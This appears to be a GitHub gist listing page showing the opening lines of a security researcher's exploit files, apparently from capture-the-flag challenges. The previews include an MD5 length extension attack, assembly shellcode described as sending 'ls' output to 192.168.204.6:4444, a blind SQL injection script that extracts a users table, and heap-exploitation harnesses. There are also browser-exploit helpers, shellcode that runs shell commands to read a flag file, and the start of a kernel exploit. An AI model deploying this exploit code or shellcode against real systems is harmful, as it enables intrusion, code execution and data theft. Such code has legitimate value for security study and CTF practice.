Yudai ptr-yudai
ptr-yudai
/ lenxpand.py
Last active
August 28, 2018 15:30
Length Extension Attack against MD5 (Python2)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding: utf-8 | |
| import struct | |
| # | |
| # MD5 | |
| # | |
| def md5hex(message, iv=(0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476), prevlen=0): | |
| A, B, C, D = md5(message, iv, prevlen) | |
| md5sum = struct.pack('<I', A) | |
| md5sum += struct.pack('<I', B) |
ptr-yudai
/ exploit.asm
Created
December 24, 2018 14:40
Send the result of `ls` to 192.168.204.6:4444
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Socket | |
| mov al, 41 | |
| push 2 | |
| pop rdi | |
| push 1 | |
| pop rsi | |
| cdq | |
| syscall | |
| ; Connect | |
| xchg edi, eax |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import requests | |
| import json | |
| data = '' | |
| for j in range(7, 0x100): | |
| i = 0 | |
| while i < 8: | |
| payload = { | |
| 'limit': "(SELECT (ASCII(SUBSTRING((SELECT users::text FROM users LIMIT 1 OFFSET 4),{},1)) >> {}) & 1)".format(j, i) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| def new(size, data): | |
| sock.sendlineafter("Exit\n", "1") | |
| sock.recvline() | |
| sock.sendline(str(size)) | |
| sock.recvline() | |
| sock.sendline(data) | |
| def delete(index): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Utils | |
| */ | |
| let conversion_buffer = new ArrayBuffer(8); | |
| let float_view = new Float64Array(conversion_buffer); | |
| let int_view = new BigUint64Array(conversion_buffer); | |
| BigInt.prototype.hex = function() { | |
| return '0x' + this.toString(16); | |
| }; | |
| BigInt.prototype.i2f = function() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| def add(index, data): | |
| sock.sendlineafter("> ", "1") | |
| sock.sendlineafter(": ", str(index)) | |
| sock.sendlineafter(": ", data) | |
| def show(index): | |
| sock.sendlineafter("> ", "5") | |
| sock.sendlineafter(": ", str(index)) | |
| length = int(sock.recvlineafter(": ")) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| array<uint64> a = make_array<uint64>(4); | |
| array<uint64> b = make_array<uint64>(3); | |
| ref<array<uint64>> victim = new<array<uint64>>(); | |
| string shellcode = "\x31\xd2\x52\xe8\x1c\x00\x00\x00\x2f\x62\x69\x6e\x2f\x6c\x73\x20\x2d\x6c\x68\x61\x3b\x20\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67\x00\xe8\x03\x00\x00\x00\x2d\x63\x00\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5f\x57\x48\x89\xe6\xb8\x3b\x00\x00\x00\x0f\x05\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05"; | |
| def void race() { | |
| int64 i = 0; | |
| while(1) { | |
| deref(victim) = a; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| """ | |
| typedef struct { | |
| vector<Prisoner> people; | |
| int number; | |
| } PrisonManager; | |
| typedef struct { | |
| string name; | |
| long age; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| """ | |
| typedef struct { | |
| unsigned long id; | |
| std::string candidate; | |
| std::string state; | |
| std::string gender; | |
| long age; | |
| bool employed; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <fcntl.h> | |
| #include <string.h> | |
| #include <sys/mman.h> | |
| #include <sys/ioctl.h> | |
| unsigned long user_cs; | |
| unsigned long user_ss; |